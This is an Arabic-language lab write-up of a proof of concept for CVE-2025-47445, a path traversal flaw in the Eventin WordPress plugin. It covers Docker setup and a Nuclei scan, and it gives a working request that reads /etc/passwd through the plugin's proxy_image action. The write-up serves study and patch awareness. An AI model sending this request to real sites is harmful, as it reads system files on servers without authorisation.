
إثبات مفهوم لاستغلال CVE-2025-47445، وهي ثغرة اجتياز المسار في إضافة Eventin لووردبريس. يتضمن تعليمات إعداد بيئة Docker محلية وخطوات استغلال يدوية.
| المعلومات |
|---|
| إضافة ووردبريس: | Wordpress Eventin |
| إصدار الإضافة: | 4.0.26 (أو أقدم) |
| معلومات CVE: | Project Discovery - مكتبة الثغرات |
| CVEdetails.com | |
| أدوات ذات صلة: | بيئة مختبر Wordfence |
| Docker | |
| Burp Suite | |
| Nuclei |
يأتي مختبر ووردبريس Docker من Worfence ببيئتين مختلفتين، إحداهما تحتوي على إصدار PHP قديم، وسنختار الأحدث.
# في مجلد dockerwp84
docker-compose build
docker-compose up -d
بعد ذلك قمت بإعداد صفحة ووردبريس من خلال localhost:1337. قمت بتنزيل إضافة Eventin، وتحديداً الإصدار 4.0.26 من متجر الإضافات، ثم تثبيتها وتفعيلها عبر واجهة ووردبريس.
الآن كل شيء يجب أن يكون جاهزاً.
أريد التحقق مما إذا كان Nuclei يمكنه العثور على CVE التي أبحث عنها، لذلك أقوم بتشغيل مثيل من خلال حاوية Docker مؤقتة.
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337
لقد حاولت تشغيل Nuclei عدة مرات وحصلت على نتائج مختلفة، لست متأكداً من السبب. لكن في النهاية يعثر على CVE، وبعض الأشياء الأخرى التي لم أكن أبحث عنها تحديداً.

لمعرفة ما إذا كان بإمكاني الوصول إلى ملف /etc/passwd، قمت بإدخال الحمولة التالية في طلب GET الخاص بي.
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd
وقد نجح الأمر.

تم ذلك لأغراض تعليمية.
تأكد من تحديث جميع برامجك. يتم اكتشاف CVEs جديدة كل يوم.